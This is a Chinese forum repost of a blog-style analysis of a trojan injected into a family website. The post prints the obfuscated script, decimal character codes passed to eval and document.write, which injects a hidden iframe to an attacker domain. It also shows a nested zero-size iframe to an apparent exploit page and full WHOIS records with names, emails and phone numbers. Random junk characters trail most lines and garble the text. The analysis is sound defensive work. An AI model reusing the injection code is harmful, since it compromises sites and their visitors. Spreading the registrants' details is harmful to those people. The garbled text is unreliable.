[原创]一篇刚写的分析木马手记

首发在我的博客里面， }^bL'
 

u5|e9(J  
http://www.areway.cn/?p=175 w!k4&Rb3  
J0z0%p   
">^]^wa08  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： lNPbU ~k  
          OmuZ0@.  
<script>t=’60,105,102,114,97,109,101, xa^HU
~  
32,115,114,99,61,104,116,116,112,58,47,47, q`K-T_<  
102,114,101,101,46,117,45,117,117,117,46,99, ?{Z0g+B1  
110,47,101,114,114,111,114,46,104,116,109, $7 Uk;xV  
32,119,105,100,116,104,61,49,48,48,32,104, xR%a
yT.  
101,105,103,104,116,61,48,62,60,47,105,102, ="eum7  
114,97,109,101,62′; s+~Slgl  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> L2A#OZZu  
                                                                                                  &H>dE]Hq,  
<script>t=’60,105,102,114,97,109,101,32,115, _NW OSt  
114,99,61,104,116,116,112,58,47,47,102,114, cCCplL  
101,101,46,117,45,117,117,117,46,99,110,47, DLM9o3/*J  
101,114,114,111,114,46,104,116,109,32,119, 'GoeVq  
105,100,116,104,61,49,48,48,32,104,101,105, *N+aZV}`Z  
103,104,116,61,48,62,60,47,105,102,114,97, ~7H.<kJt  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); ;;H:$lx  
document.write(t);</script> 6KTY`'I  
                                                                                                  >mltE$|  
<html xmlns=” Q 8E~hgO  
http://www.w3.org/1999/xhtml }iloX#  
“> *}&aK}h}I  
<head> oh)l\  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> \gXx{rLW  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> 1qN9bwRO  
<title>首页 - 爱生活家庭网 *\vc_NP]  
                                                                                                                                                    3k0%H]wt  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 U.0/r!po  
转换字符串后的大概内容是（谁点击后果自付）： v%Q7\X(  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… }}Uv0g8D  
                                                                                                                                  ><7`$2Or  
查询玉米u-uuu.cn的详细信息： zSXC  
Domain Name: u-uuu.cn 8H b|'Q|^  
ROID: 20070901s10001s64972306-cn '$
^ F.2  
Domain Status: ok J>PV{N  
Registrant Organization: 王雷 >Tx;<G  
Registrant Name: 王雷 PFw"ICs  
Administrative Email: czlovexs@126.com Ol0|)0  
Sponsoring Registrar: 北京万网志成科技有限公司 b(Xg6
 
Name Server:ns.yovole.com 4!qDG+m  
Name Server:ns1.yovole.com qnRz
s  
Registration Date: 2007-09-01 17:54 EKD>c$T^  
Expiration Date: 2008-09-01 17:54 ?8m/]P/~  
最后PING了一下地址 都没有什么…. 6p{x2>2y[  
                                                                                                /Q_\h+`  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. N^N?!I  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> DNe^_v)]|  
<script language=”javascript” src=” Ee&$9 )t  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script OwaXG/z~  
> %%[TM(z  
这个玉米应该有可能是木马作者的： o$k$  
foafau.info的详细信息： eP?|U.on  
Access to INFO WHOIS information is provided to assist persons in &Hxr3[+$  
determining the contents of a domain name registration record in the *p!dd?
8  
Afilias registry database. The data in this record is provided by [DEw:%  
Afilias Limited for informational purposes only, and Afilias does not mm`3-F|  
guarantee its accuracy.  This service is intended only for query-based Tq8r SZi  
access. You agree that you will use this data only for lawful purposes NR@Tj]`k  
and that, under no circumstances will you use this data to: (a) allow, uHCgIR l>  
enable, or otherwise support the transmission by e-mail, telephone, or t}
gqk'  
facsimile of mass unsolicited, commercial advertising or solicitations zl?N1>KS  
to entities other than the data recipient’s own existing customers; or E9hWn0 e  
(b) enable high volume, automated, electronic processes that send _O<{H'4NO  
queries or data to the systems of Registry Operator, a Registrar, or dY.uOafr  
Afilias except as reasonably necessary to register domain names or KJfyh=AD(  
modify existing registrations. All rights reserved. Afilias reserves {`Z)'G\`  
the right to modify these terms at any time. By submitting this query, Oc`fQqYy  
you agree to abide by this policy. BE)l77=/  
Domain ID:D22418703-LRMS ^*Fkt(ida  
Domain Name:FOAFAU.INFO M3kE91  
Created On:20-Nov-2007 16:05:42 UTC 20)Il:x  
Last Updated On:20-Nov-2007 16:05:44 UTC 6u}NI!he  
Expiration Date:20-Nov-2008 16:05:42 UTC `yXy T^  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) }VRo:sJb  
Status:CLIENT DELETE PROHIBITED 5i?U-  
Status:CLIENT RENEW PROHIBITED 3MVZ*'1QM\  
Status:CLIENT TRANSFER PROHIBITED I,;)pWX=@  
Status:CLIENT UPDATE PROHIBITED )O Cr6UR  
Status:TRANSFER PROHIBITED t79MBgZ  
Registrant ID:GODA-040110615 Oa .%n9ec  
Registrant Name:liu hong O=/Tx2i;  
Registrant Organization: )Cl&"bX  
Registrant Street1:beijing swA"_A8>u  
Registrant Street2: W~FA9Jd'Z  
Registrant Street3: quYZD6IH  
Registrant City:beijing s#[Ej&2[=  
Registrant State/Province: Wg1WY}zG  
Registrant Postal Code:100000 W=m_G]"L  
Registrant Country:CN iz(+(M  
Registrant Phone:+86.860108888777 '3VrHL@@g  
Registrant Phone Ext.: 9E+lri
yY  
Registrant FAX: !%@{S8IP.v  
Registrant FAX Ext.: Gov{jksr  
Registrant Email:bbbshiji@163.com ~/%){t/uLY  
Admin ID:GODA-240110615 mUbaR  
Admin Name:liu hong 'z'm:|JW  
Admin Organization: enj2xye%Y  
Admin Street1:beijing %9
.KH  
Admin Street2: ez>@'yhK  
Admin Street3: RT>3\qhZ  
Admin City:beijing t;'.D @  
Admin State/Province: _HQa3wj  
Admin Postal Code:100000 KWo)}m*6  
Admin Country:CN M{QNpoM  
Admin Phone:+86.860108888777 HPQ,tlp6j  
Admin Phone Ext.: OA0\b_  
Admin FAX: `L>'9rbZO  
Admin FAX Ext.: Zn//u<D  
Admin Email:bbbshiji@163.com t}nRWo  
Billing ID:GODA-340110615 ;Z*RCuwg  
Billing Name:liu hong );[`rXH_  
Billing Organization: 4 #N#[;M  
Billing Street1:beijing /a_|oCeC}  
Billing Street2: eC-TZH@  
Billing Street3: P+SCX#{y  
Billing City:beijing 49m/UeNZ  
Billing State/Province: GFidriC  
Billing Postal Code:100000 ov~m?Y]h  
Billing Country:CN ~0NZx8qG  
Billing Phone:+86.860108888777 U DG _APf  
Billing Phone Ext.: I}=}S"v  
Billing FAX: r%m2$vx#  
Billing FAX Ext.: 2i)y'+s  
Billing Email:bbbshiji@163.com Mx }(w\\T  
Tech ID:GODA-140110615 :Us-^zVr  
Tech Name:liu hong Ow I?(ruL'  
Tech Organization: 9[!
Hz)|X  
Tech Street1:beijing rdRX  
Tech Street2: ".u?-xcbJ  
Tech Street3: 0AEs+=  
Tech City:beijing gyK"#-/_d  
Tech State/Province: K*<n<;W  
Tech Postal Code:100000 9=SZL~#CE  
Tech Country:CN L!Ro`6|7;  
Tech Phone:+86.860108888777 D-.>Dw:  
Tech Phone Ext.: @'<|B. f  
Tech FAX: 82vx:*Ip!}  
Tech FAX Ext.: UgP5^3F2  
Tech Email:bbbshiji@163.com i@RjG
 
Name Server:NS27.DOMAINCONTROL.COM }b
VyvH  
Name Server:NS28.DOMAINCONTROL.COM SZPu"O\  
Name Server: f19 i !  
Name Server: 9`muk  
Name Server: rW^&8E[  
Name Server: +uA<g`4  
Name Server: 4)ISRR  
Name Server:  ,Y!)V  
Name Server: 'K1w.hC<  
Name Server: 7qk61YBLz  
Name Server: ?9mY #_Of  
Name Server: T^'i+>F!w  
Name Server: |z~?"F6 Y<  
                                                                                                          :97`IV%
 
接着下载每个文件里面的代码： T2dpn%I  
一步一步看.. O6pjuhMx  
&~&i >  
-4]6tt'G  
]
k8XLgJ  
ZBGI_9wZ  
oAL-v428  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来